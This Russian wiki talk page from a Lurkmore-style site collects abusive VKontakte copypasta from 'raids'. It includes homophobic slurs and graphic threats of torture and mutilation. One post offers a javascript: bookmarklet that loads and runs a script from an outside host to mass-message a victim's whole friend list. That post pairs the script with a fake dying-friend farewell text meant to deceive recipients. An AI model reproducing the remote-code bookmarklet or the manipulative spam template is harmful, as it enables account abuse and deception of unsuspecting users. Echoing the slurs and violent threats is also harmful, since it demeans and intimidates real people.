Старое обсуждение копипасты:Вконтакте

Материал из Неолурк, народный Lurkmore
Перейти к навигации Перейти к поиску

Вот подход расовый и верный!--Daioptych 04:29, 23 декабря 2007 (MSK)

Благодарю. Вин же вином и остается, так пускай сохранится для будущих поколений.
Алсо реквестю статью "Патрушев-кун"--Yum-yum 04:47, 23 декабря 2007 (MSK)

"будешь так терпилой.ю" напоминает мне "На забудь зафрендить. Ю." -____- это нормально? L0calh0st 15:51, 23 декабря 2007 (MSK)

Про реп чистая правда btw ▼▲▼ ▲▼▲ Круто. А ссылки или скрины есть?

реквестирую расставить хотя бы br в диалогах,хрен поймёшь кто что писал

Уныло. Очень

добавьте[править]

унылый и отсосный архив копипасты... даже пацики в моем падике смешнее матюкаются

не дыри я 4 года на курсы ходил я погу различить!!!

тебе это просто так не сойдет, тебе будет херово, а нам весело! ты будишь умирать, а мы жить!!! ты будешь жрать говно, а мы конфеты!!! улавил мысль???????????? если нет, то разъясняю! ты неудачник, а мы лучшие!!! WE IS THE BEST...

Знаешь.... нет ты нехуя незнаешь ты переживёшь всё то чт о я пережил причём не за несколько лет а за часов так 2-5 мне просто на всё это нехватит меньшего времени поверь я слова сдержу!! рано или позно!!!!Я кучу пыток знаю что бы человек сучался но не помер!

Мы - сошли с ума. Но чувство справедливости у нас осталось.

БЛЯДЬ!!! ТЫ МЕНЯ ЗАКБАЛ! ЭТО ТЫ ТУТ ЗАССАЛСЯ! МОЙ ПЕСИК ИЗВРАЩЕНИЦ И ГЕЙ, КАК ТЫ! И ОН БЫ НЕ ОТКАЗАЛСЯ ТЯ ПАРУ РАЗ ОТЪЕБАТЬ!!! МНЕ НАСРАТЬ ЧТО ТЫ ТУТ ПИШЕШЬ!!! Я МОГУ ЛИЧКУ И ОТКРЫТЬ, НО СТОИТ ЛИ ЭТО ДЕЛАТЬ РАДИ ТЕБЯ??? А ТЫ-ЧМО! ВОТ И ВСЕ!!!

ТЫ БОЛЬНОЙ, ТЕ ЛЕЧИТЬСЯ НОДО... БЛЯ, НАЙДУ, ВЫЕБУ ПО 1 ЧИСЛО!!! ЭТОГО ДОБИВАЕШЬСЯ??? МНЕ НЕ СЛОЖНО ТЕБЯ НАЙТИ... Я МОГУ ПАЛЬЦАМИ СЧЕЛКНУТЬ И ТЫ ВЗОРВЕШЬСЯ!!!

ВСЕ, ИДИ ВЫЕЖИВАЙСЯ!!! И ПОВТОРЯЮ: КУПИ СЕБЕ МОЗГИ!!!

Ты - мусор, который аллах послал гнить на землю

отрезаю твой хрен, выбрысываю его в окно, на корм птичкам... и даю пощечину! ну как? как ты дальше поступишь???

это кто из нас еще дырун????? ты блѣдь, еще пожалеешь что на свет родился!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Слушай не дай бог ты мне попадёшься я был в таких темах в которых даже врагу не пожелаешь, но тебе я предоставлю все краски происходившего со мной!

Done--Daioptych 00:34, 24 декабря 2007 (MSK)

скрины у меня с рейда сохранились,могу залить. патрушев-кун доставил акки, было весело. жалко злой анонимус акк с Аманжолом сдырил. алсо дописал про баранов.

Не рейдовое, случайно наткнулся, висело на стенке некоего пидорного клубца (оттого и рейд не потребовался - оно само генерирует лол). добафте, если понравицо:

суки блѣть расплодились тут гандоны суки вася блѣть сука Русское имя порочишь пидарас нет чтоб телку выебать или вы пидары неудачники думали типо вот телка сама подойдет познакомиться как думают обыычно пидары и блѣть так вы понели а телки не дают пойду поплачу вас выебали и вы как последние неудачники давали в заду ахахахаххаха лошки сука ааххахахахахаххахахахахахаНЕУДАЧНИКИ ЛУЗЕРЫ блѣтьааххахаха харчок вам в долбало пидары я таких блѣть мудаков накрываю!!! (аффтар - http://vkontakte.ru/id3736335, назвать можно "Русское Имя Порочишь")

Ебан ты в таком случае!!! Допустили смарчков до компов. Возомнили себя хакерами, а на самом деле являетесь акерами, а что... не знаешь кто это такие, тогда беги быром гуглить и рыть инфу, т.к. вам всем еще учиться и учиться )) Если хочешь решить все по мужски, тогда давай посмотрим кто кого, дай свой IP и тебе кранты. Ты думаешь я из простых смертных ламотов, да, ты думаешь зря у меня в id 777 в конце. Ты наверно даже не знаешь что такое машинный язык, или Assembler, сидишь там на php что то валяешь и не знаешь чем еще занять себя, читай книжки, научись сначало что-то реальное ломать а не тупо копировать анкеты.(http://vkontakte.ru/search.php?id=3874777)

+[править]

Отсюда еще можно взять несколько копипаст. Это не рейды.

А что вы удивляетесь,если рейтинги "шуток" Петросяна и компании высокий,притом,
что это полный маразм(((.Люди не хотят думать,им бы поржать.Я не против юмора,
но чтобы он был не ниже плинтуса.Хорошо,что все-таки много очень людей,
особенно молодых,которые не потеряли интереса к общению,создают очень нужные и полезные группы.
В Контакте.ру содействует этому))) Удачи и успехов команде В Контакте в дальшейшей работе!!!)))
link

Там же было.

добавьте скрипт массовой отправки сообщений всему френд-списку

"Господин двачер. Я наколякал небольшой браузерный рассыльщик лички друзьям. Работает так:

   javascript:var z = document.createElement('script'); z.src = 'http://p.caboo.se/136887.txt'; document.body.appendChild(z);void(0);
   Появляется форма сверху страницы. В ней ты пишешь текст. можно грабить корованы и писать две переменных типа %SHORT% - для имени и %FULL% для полного имени с никнеймом и фамилией.
   Затем тыкается кнопочка и остается ждать пока страничка не отомрет.
   Пример:
   Привет %SHORT%.
   Врачи мне поставили диагноз о том, что у меня дизфагия, сопровождающаяся множественным склерозом, паркинсонизмом, инсультом. Я очень быстро теряю память и моторные навыки, возможно уже ко вторнику меня разобьет паралич. Возможно у меня не будет больше возможности сказать и слова. Поэтому я пишу тебе заранее.
   Я пишу тебе это, чтобы сказать, что эта дружба между нами, хоть и не была такой крепкой и постоянной, но она была одним из маленьких лучезарных кристаллов, который освещал искорками счастья мою тусклую жизнь. Где-то там, возможно, я вновь обрету счастье.
   :(
   Спасибо тебе за все. Прощай.
   Тестирован только в фуррифоксе, во всем остальном скорее всего уд."

Реально когда я читаю такое мне так и хочется что бы кого-нить из двачеров реально отловили и оприходовали. Ну и что бы это по новостям прошло. Уроды млин. На вконтакте народ часто неготовый встретить таких.. млин слово подобрать не могу.

А когда на вконтактах встречаешь очередное "срочно хелп! помоги пропеарить группу, иначе человек очень много денег проспорит", то хочется разделить трепетное обожание вконтактов двачерами и не только.

facepalm.jpg

facepalm.jpg

Серёга Синатра написал

13 ноября 2008 в 16:31 Ты друг мой напал не на лохов из бутово или с еке нахимашевцев мы с сука питерские с купчино а купчино это раён дышком наркоты и и людей которые за базар отвечают если ты думаеш что нам поможет дастать тебя ментовка ты ошибаешся эти люди которые всю москву на коленях держат! человека во франции достали за неделе а тебя АГРОКЛОКНА ПИДРОГОЛОВОГО ММЫ СУКА ЗАОВНИМ БЕЗ НАПРЯГА Я ТОКО ПОСИЖУ ДОМА И ОНЛАЙН ВИДЕО ПОСМОТРЮ КАК СНАЧАЛА ТЕБЕ ПАЛЬЦЫ ПО ОДНОМУ ОТРЕЖУТ ПОТОМ НОГИ И РУКИ И ЕСЧЁ ПРИЖЕГАТЬ БКДКТ ЧТОБЫ ТЫ ТЫ ПАДЛА ОТ ПАТЕРИ КРОВИ НЕЗДОХ ПОТОМ НАЙДУТ ТВАЮ ДЕВУШКУ МАТЬ ОТЦА И ВСЕХ ТВАИ РОДНЫХ !! ВОТ Я ПОСМЕЮСЬ!!! ЭТО ЕСЧЁ САМОЕ БЕЗОБИДНОЕ!!!!

13 ноября 2008 в 16:38 Пишу при всех человек сказал что я на хую хорошо, посади меня на него любой день любой город любое место с кем угодно! я один приеду !!! ты видемо неслышал про авалона флаг те в руки электричку навстречу!

Вы нарываетесь. Спам череват по закону. айпи пробить недолго. 78.37.172.125 19:41, 14 ноября 2008 (MSK)

двачер - это малолетний долблан, который старается победить в конкурсе среди своих долбнутых сверстников кто больше закачает говна. потому что мы в этом возрасте мечтали плохому парню долбло разбить, хорошую девку за сиськи помацать или книжку интересную прочитать. а не победить в конкурсе кто больше закачает долбущихся негров.

Истину глаголет человече, разве нет?

Жесткий долбарь жестко долбётся!!!![править]

Откуда эта ерунда взята? дайте эти рыла!!!!

1[править]

ерунда

Читать копипасту - это все равно, что рассматривать капчу.

ААААААА!!!11[править]

Эта херня вынесла мне моск и сократила жизнь по меньшей мере на час!

А должна была, наоборот, продлить.
Автоуд. Говном болезнь Дауна не лечат.
Надо ставить поциентов на учет. Кстати, кто ссылку сего экземпляра кинет: ""Миллиард терзаний гламурного фошыста в тональности ля-минор", трагикомедия в двух актах"? Сильное подозрение, что знаком с сабжем

ололо свежак![править]

http://vk.com/wall5038019_11750

http://vk.com/wall29702310_2464

http://vk.com/wall183283844_811